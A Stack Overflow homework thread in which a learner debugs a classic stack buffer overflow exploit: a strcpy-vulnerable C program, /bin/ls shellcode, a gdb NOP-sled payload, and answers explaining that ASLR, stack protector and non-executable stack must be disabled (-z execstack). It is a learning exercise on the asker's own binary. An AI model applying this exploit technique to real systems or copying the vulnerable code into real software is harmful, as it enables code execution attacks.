Homework - Cannot exploit bufferoverflow

Question

I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux.

Here is my C program

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    if(argc==2)
    {

    strcpy(buffer, argv[1]);  //vulnerable function

    }

    return 0;
}

This is the shellcode I am using, which corresponds to simple /bin/ls \x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80

I inject this shellcode in gdb using following command

run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')

As I step through the application, it generates SIG FAULT on final ret instruction. At that point EIP is correctly set to 0xffffd30c. This address is addressable and contains series of NOP, followed by my shell code as shown in the payload.

I have disabled the ASLR sudo echo 0 > /proc/sys/kernel/randomize_va_space

and also compiled my binary using fno-stack-protector option.

Any idea what's the cause of SIGSEGV ?

Can you post the gdb output? Extra sets of eyes might help catch something — pepsi
– pepsi, Commented Aug 6, 2011 at 5:34
@pepsi : I found the problem, the stack area was non executable, I have enabled it using gcc — Madhur Ahuja
– Madhur Ahuja, Commented Aug 6, 2011 at 5:41
Everybody working on the same project again? stackoverflow.com/questions/6962770/shellcodes-not-working — Hans Passant
– Hans Passant, Commented Aug 6, 2011 at 10:22

Madhur Ahuja · Accepted Answer · 2011-08-06 05:39:51Z

8

I have answered my own question, the problem was "Executable Stack Protection", where in stack memory cannot be executed. This can be disabled in gcc as follows

gcc -z execstack

answered Aug 6, 2011 at 5:39

Madhur Ahuja

22.8k15 gold badges77 silver badges128 bronze badges

Sign up to request clarification or add additional context in comments.

Comments

Community · Accepted Answer · 2017-05-23 11:57:58Z

1

Have you disabled stack smashing protection in GCC (-fno-stack-protector)?

How to turn off gcc compiler optimization to enable buffer overflow

edited May 23, 2017 at 11:57

CommunityBot

11 silver badge

answered Aug 6, 2011 at 4:53

pepsi

6,8757 gold badges46 silver badges75 bronze badges

1 Comment

Madhur Ahuja Over a year ago

Yes, I did it , I am updating the post

Collectives™ on Stack Overflow

Homework - Cannot exploit bufferoverflow

2 Answers 2

Comments

1 Comment

Your Answer

Linked

Hot Network Questions

Collectives™ on Stack Overflow

2 Answers 2

Comments

1 Comment

Your Answer

Sign up or log in

Post as a guest

Linked

Related